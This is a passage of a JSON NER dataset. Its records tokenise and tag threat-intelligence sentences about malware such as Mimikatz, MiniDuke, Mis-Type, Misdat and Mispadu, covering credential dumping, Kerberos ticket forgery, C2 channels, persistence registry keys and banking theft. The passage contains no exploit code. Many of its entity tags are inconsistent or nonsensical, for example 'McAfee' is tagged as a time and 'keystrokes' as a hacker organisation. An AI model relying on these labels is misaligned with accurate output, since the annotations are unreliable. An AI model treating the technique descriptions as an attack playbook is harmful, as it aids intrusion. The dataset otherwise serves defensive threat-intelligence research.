"O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MimiPenguin", "can", "use", "the", "`<PID>/maps`", "and", "`<PID>/mem`", "file", "to", "search", "for", "regex", "patterns", "and", "dump", "the", "process", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Mimikatz", "credential", "dumper", "has", "been", "extended", "to", "include", "Skeleton", "Key", "domain", "controller", "authentication", "bypass", "functionality.", "The", "<code>LSADUMP::ChangeNTLM</code>", "and", "<code>LSADUMP::SetNTLM</code>", "modules", "can", "also", "manipulate", "the", "password", "hash", "of", "an", "account", "without", "knowing", "the", "clear", "text", "value." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "performs", "credential", "dumping", "to", "obtain", "account", "and", "password", "information", "useful", "in", "gaining", "access", "to", "additional", "systems", "and", "enterprise", "network", "resources.", "It", "contains", "functionality", "to", "acquire", "information", "about", "credentials", "in", "many", "ways,", "including", "from", "the", "credential", "vault", "and", "DPAPI." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mimikatz", "performs", "credential", "dumping", "to", "obtain", "account", "and", "password", "information", "useful", "in", "gaining", "access", "to", "additional", "systems", "and", "enterprise", "network", "resources.", "It", "contains", "functionality", "to", "acquire", "information", "about", "credentials", "in", "many", "ways,", "including", "from", "DPAPI." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mimikatz", "performs", "credential", "dumping", "to", "obtain", "account", "and", "password", "information", "useful", "in", "gaining", "access", "to", "additional", "systems", "and", "enterprise", "network", "resources.", "It", "contains", "functionality", "to", "acquire", "information", "about", "credentials", "in", "many", "ways,", "including", "from", "DCSync/NetSync." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Mimikatz's", "kerberos", "module", "can", "create", "golden", "tickets." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Mimikatz", "performs", "credential", "dumping", "to", "obtain", "account", "and", "password", "information", "useful", "in", "gaining", "access", "to", "additional", "systems", "and", "enterprise", "network", "resources.", "It", "contains", "functionality", "to", "acquire", "information", "about", "credentials", "in", "many", "ways,", "including", "from", "the", "LSA." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "performs", "credential", "dumping", "to", "obtain", "account", "and", "password", "information", "useful", "in", "gaining", "access", "to", "additional", "systems", "and", "enterprise", "network", "resources.", "It", "contains", "functionality", "to", "acquire", "information", "about", "credentials", "in", "many", "ways,", "including", "from", "the", "LSASS", "Memory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz's", "<code>SEKURLSA::Pth</code>", "module", "can", "impersonate", "a", "user,", "with", "only", "a", "password", "hash,", "to", "execute", "arbitrary", "commands." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz’s", "<code>LSADUMP::DCSync</code>", "and", "<code>KERBEROS::PTT</code>", "modules", "implement", "the", "three", "steps", "required", "to", "extract", "the", "krbtgt", "account", "hash", "and", "create/use", "Kerberos", "tickets." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz's", "<code>CRYPTO::Extract</code>", "module", "can", "extract", "keys", "by", "interacting", "with", "Windows", "cryptographic", "application", "programming", "interface", "(API)", "functions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz’s", "<code>LSADUMP::DCShadow</code>", "module", "can", "be", "used", "to", "make", "AD", "updates", "by", "temporarily", "setting", "a", "computer", "to", "be", "a", "DC." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz's", "<code>MISC::AddSid</code>", "module", "can", "append", "any", "SID", "or", "user/group", "account", "to", "a", "user's", "SID-History.", "Mimikatz", "also", "utilizes", "SID-History", "Injection", "to", "expand", "the", "scope", "of", "other", "components", "such", "as", "generated", "Kerberos", "Golden", "Tickets", "and", "DCSync", "beyond", "a", "single", "domain." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "B-SecTeam", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "performs", "credential", "dumping", "to", "obtain", "account", "and", "password", "information", "useful", "in", "gaining", "access", "to", "additional", "systems", "and", "enterprise", "network", "resources.", "It", "contains", "functionality", "to", "acquire", "information", "about", "credentials", "in", "many", "ways,", "including", "from", "the", "SAM", "table." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Mimikatz", "credential", "dumper", "contains", "an", "implementation", "of", "an", "SSP." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mimikatz's", "kerberos", "module", "can", "create", "silver", "tickets." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Mimikatz's", "`CRYPTO`", "module", "can", "create", "and", "export", "various", "types", "of", "authentication", "certificates." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Mimikatz", "contains", "functionality", "to", "acquire", "credentials", "from", "the", "Windows", "Credential", "Manager." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Miner-C", "copies", "itself", "into", "the", "public", "folder", "of", "Network", "Attached", "Storage", "(NAS)", "devices", "and", "infects", "new", "victims", "who", "open", "the", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "MiniDuke", "components", "use", "Twitter", "to", "initially", "obtain", "the", "address", "of", "a", "C2", "server", "or", "as", "a", "backup", "if", "no", "hard-coded", "C2", "server", "responds." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Org", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MiniDuke", "can", "use", "DGA", "to", "generate", "new", "Twitter", "URLs", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MiniDuke", "uses", "Google", "Search", "to", "identify", "C2", "servers", "if", "its", "primary", "C2", "method", "via", "Twitter", "is", "not", "working." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O" ] }, { "tokens": [ "MiniDuke", "can", "enumerate", "local", "drives." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "MiniDuke", "can", "download", "additional", "encrypted", "backdoors", "onto", "the", "victim", "via", "GIF", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "MiniDuke", "can", "can", "use", "a", "named", "pipe", "to", "forward", "communications", "from", "one", "compromised", "machine", "with", "internet", "access", "to", "other", "compromised", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MiniDuke", "can", "use", "control", "flow", "flattening", "to", "obscure", "code." ], "ner_tags": [ "B-Way", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MiniDuke", "can", "gather", "the", "hostname", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "MiniDuke", "uses", "HTTP", "and", "HTTPS", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MirageFox", "is", "likely", "loaded", "via", "DLL", "hijacking", "into", "a", "legitimate", "McAfee", "binary." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "B-Time", "O" ] }, { "tokens": [ "MirageFox", "has", "a", "function", "for", "decrypting", "data", "containing", "C2", "configuration", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "MirageFox", "can", "collect", "CPU", "and", "architecture", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "MirageFox", "can", "gather", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MirageFox", "has", "the", "capability", "to", "execute", "commands", "using", "cmd.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Mis-Type", "has", "created", "registry", "keys", "for", "persistence,", "including", "`HKCU\\Software\\bkfouerioyou`,", "`HKLM\\SOFTWARE\\Microsoft\\Active", "Setup\\Installed", "Components\\{6afa8072-b2b1-31a8-b5c1-{Unique", "Identifier}`,", "and", "`HKLM\\SOFTWARE\\Microsoft\\Active", "Setup\\Installed", "Components\\{3BF41072-B2B1-31A8-B5C1-{Unique", "Identifier}`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "has", "collected", "files", "and", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "has", "transmitted", "collected", "files", "and", "data", "to", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "first", "attempts", "to", "use", "a", "Base64-encoded", "network", "protocol", "over", "a", "raw", "TCP", "socket", "for", "C2,", "and", "if", "that", "method", "fails,", "falls", "back", "to", "a", "secondary", "HTTP-based", "protocol", "to", "communicate", "to", "an", "alternate", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "has", "downloaded", "additional", "malware", "and", "files", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "may", "create", "a", "file", "containing", "the", "results", "of", "the", "command", "<code>cmd.exe", "/c", "net", "user", "{Username}</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "may", "create", "a", "temporary", "user", "on", "the", "system", "named", "`Lost_{Unique", "Identifier}`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "has", "temporarily", "stored", "collected", "information", "to", "the", "files", "`“%AppData%\\{Unique", "Identifier}\\HOSTRURKLSR”`", "and", "`“%AppData%\\{Unique", "Identifier}\\NEWERSSEMP”`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "saves", "itself", "as", "a", "file", "named", "`msdtc.exe`,", "which", "is", "also", "the", "name", "of", "the", "legitimate", "Microsoft", "Distributed", "Transaction", "Coordinator", "service", "binary." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O" ] }, { "tokens": [ "Mis-Type", "has", "used", "Windows", "API", "calls,", "including", "`NetUserAdd`", "and", "`NetUserDel`." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Mis-Type", "network", "traffic", "can", "communicate", "over", "a", "raw", "socket." ], "ner_tags": [ "B-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "has", "been", "injected", "directly", "into", "a", "running", "process,", "including", "`explorer.exe`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Mis-Type", "uses", "Base64", "encoding", "for", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "The", "initial", "beacon", "packet", "for", "Mis-Type", "contains", "the", "operating", "system", "version", "and", "file", "system", "of", "the", "victim." ], "ner_tags": [ "O", "O", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "may", "create", "a", "file", "containing", "the", "results", "of", "the", "command", "<code>cmd.exe", "/c", "ipconfig", "/all</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Mis-Type", "runs", "tests", "to", "determine", "the", "privilege", "level", "of", "the", "compromised", "user." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mis-Type", "network", "traffic", "can", "communicate", "over", "HTTP." ], "ner_tags": [ "B-Way", "I-Way", "I-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mis-Type", "has", "used", "`cmd.exe`", "to", "run", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Misdat", "has", "created", "registry", "keys", "for", "persistence,", "including", "`HKCU\\Software\\dnimtsoleht\\StubPath`,", "`HKCU\\Software\\snimtsOleht\\StubPath`,", "`HKCU\\Software\\Backtsaleht\\StubPath`,", "`HKLM\\SOFTWARE\\Microsoft\\Active", "Setup\\Installed.", "Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`,", "and", "`HKLM\\SOFTWARE\\Microsoft\\Active", "Setup\\Installed", "Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Misdat", "is", "capable", "of", "deleting", "Registry", "keys", "used", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Misdat", "has", "collected", "files", "and", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Misdat", "has", "uploaded", "files", "and", "data", "to", "its", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Misdat", "is", "capable", "of", "deleting", "the", "backdoor", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Misdat", "is", "capable", "of", "running", "commands", "to", "obtain", "a", "list", "of", "files", "and", "directories,", "as", "well", "as", "enumerating", "logical", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Misdat", "is", "capable", "of", "downloading", "files", "from", "the", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Misdat", "saves", "itself", "as", "a", "file", "named", "`msdtc.exe`,", "which", "is", "also", "the", "name", "of", "the", "legitimate", "Microsoft", "Distributed", "Transaction", "Coordinator", "service", "binary." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-Org", "O", "O" ] }, { "tokens": [ "Misdat", "has", "used", "Windows", "APIs,", "including", "`ExitWindowsEx`", "and", "`GetKeyboardType`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Misdat", "network", "traffic", "communicates", "over", "a", "raw", "socket." ], "ner_tags": [ "B-Org", "B-OffAct", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Misdat", "was", "typically", "packed", "using", "UPX." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Misdat", "network", "traffic", "is", "Base64-encoded", "plaintext." ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "initial", "beacon", "packet", "for", "Misdat", "contains", "the", "operating", "system", "version", "of", "the", "victim." ], "ner_tags": [ "O", "O", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Misdat", "has", "attempted", "to", "detect", "if", "a", "compromised", "host", "had", "a", "Japanese", "keyboard", "via", "the", "Windows", "API", "call", "`GetKeyboardType`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Many", "Misdat", "samples", "were", "programmed", "using", "Borland", "Delphi,", "which", "will", "mangle", "the", "default", "PE", "compile", "timestamp", "of", "a", "file." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Misdat", "is", "capable", "of", "providing", "shell", "functionality", "to", "the", "attacker", "to", "execute", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "contains", "a", "copy", "of", "the", "OpenSSL", "library", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "utilizes", "malicious", "Google", "Chrome", "browser", "extensions", "to", "steal", "financial", "data." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Mispadu", "can", "monitor", "browser", "activity", "for", "online", "banking", "actions", "and", "display", "full-screen", "overlay", "images", "to", "block", "user", "access", "to", "the", "intended", "site", "or", "present", "additional", "data", "fields." ], "ner_tags": [ "B-Idus", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "has", "the", "ability", "to", "capture", "and", "replace", "Bitcoin", "wallet", "data", "in", "the", "clipboard", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "has", "obtained", "credentials", "from", "mail", "clients", "via", "NirSoft", "MailPassView." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O" ] }, { "tokens": [ "Mispadu", "can", "steal", "credentials", "from", "Google", "Chrome." ], "ner_tags": [ "B-SamFile", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "decrypts", "its", "encrypted", "configuration", "files", "prior", "to", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "uses", "a", "custom", "algorithm", "to", "obfuscate", "its", "internal", "strings", "and", "uses", "hardcoded", "keys.", "Mispadu", "also", "uses", "encoded", "configuration", "files", "and", "has", "encoded", "payloads", "using", "Base64." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "can", "sends", "the", "collected", "financial", "data", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "searches", "for", "various", "filesystem", "paths", "to", "determine", "what", "banking", "applications", "are", "installed", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "can", "monitor", "browser", "activity", "for", "online", "banking", "actions", "and", "display", "full-screen", "overlay", "images", "to", "block", "user", "access", "to", "the", "intended", "site", "or", "present", "additional", "data", "fields." ], "ner_tags": [ "B-Idus", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "can", "log", "keystrokes", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "has", "relied", "on", "users", "to", "execute", "malicious", "files", "in", "order", "to", "gain", "execution", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "has", "been", "installed", "via", "MSI", "installer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Mispadu", "has", "used", "a", "variety", "of", "Windows", "API", "calls,", "including", "ShellExecute", "and", "WriteProcessMemory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Mispadu", "can", "enumerate", "the", "running", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu's", "binary", "is", "injected", "into", "memory", "via", "`WriteProcessMemory`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Mispadu", "creates", "a", "link", "in", "the", "startup", "folder", "for", "persistence.", "Mispadu", "adds", "persistence", "via", "the", "registry", "key", "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "uses", "RunDLL32", "for", "execution", "via", "its", "injector", "DLL." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Mispadu", "has", "the", "ability", "to", "capture", "screenshots", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "can", "list", "installed", "security", "products", "in", "the", "victim’s", "environment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "has", "been", "spread", "via", "malicious", "links", "embedded", "in", "emails." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mispadu", "can", "run", "checks", "to", "verify", "if", "it", "is", "running", "within", "a", "virtualized", "environments", "including", "Hyper-V,", "VirtualBox", "or", "VMWare", "and", "will", "terminate", "execution", "if", "the", "computer", "name", "is", "“JOHN-PC.”" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mispadu", "collects", "the", "OS", "version,", "computer", "name,", "and", "language", "ID." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu", "checks", "and", "will", "terminate", "execution", "if", "the", "compromised", "system’s", "language", "ID", "is", "not", "Spanish", "or", "Portuguese." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mispadu’s", "dropper", "uses", "VBS", "files", "to", "install", "payloads", "and", "perform", "execution." ], "ner_tags": [ "B-Idus", "B-SamFile", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mivast", "has", "the", "capability", "to", "download", "and", "execute", ".exe", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "B-SamFile", "O" ] }, { "tokens": [ "Mivast", "creates", "the", "following", "Registry", "entry:", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mivast", "has", "the", "capability", "to", "gather", "NTLM", "password", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "I-Features", "O" ] }, { "tokens": [ "Mivast", "has", "the", "capability", "to", "open", "a", "remote", "shell", "and", "run", "basic", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MobileOrder", "has", "a", "command", "to", "upload", "to", "its", "C2", "server", "victim", "browser", "bookmarks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MobileOrder", "exfiltrates", "data", "collected", "from", "the", "victim", "mobile", "device." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MobileOrder", "exfiltrates", "data", "to", "its", "C2", "server", "over", "the", "same", "protocol", "as", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MobileOrder", "has", "a", "command", "to", "upload", "to", "its", "C2", "server", "information", "about", "files", "on", "the", "victim", "mobile", "device,", "including", "SD", "card", "size,", "installed", "app", "list,", "SMS", "content,", "contacts,", "and", "calling", "history." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", 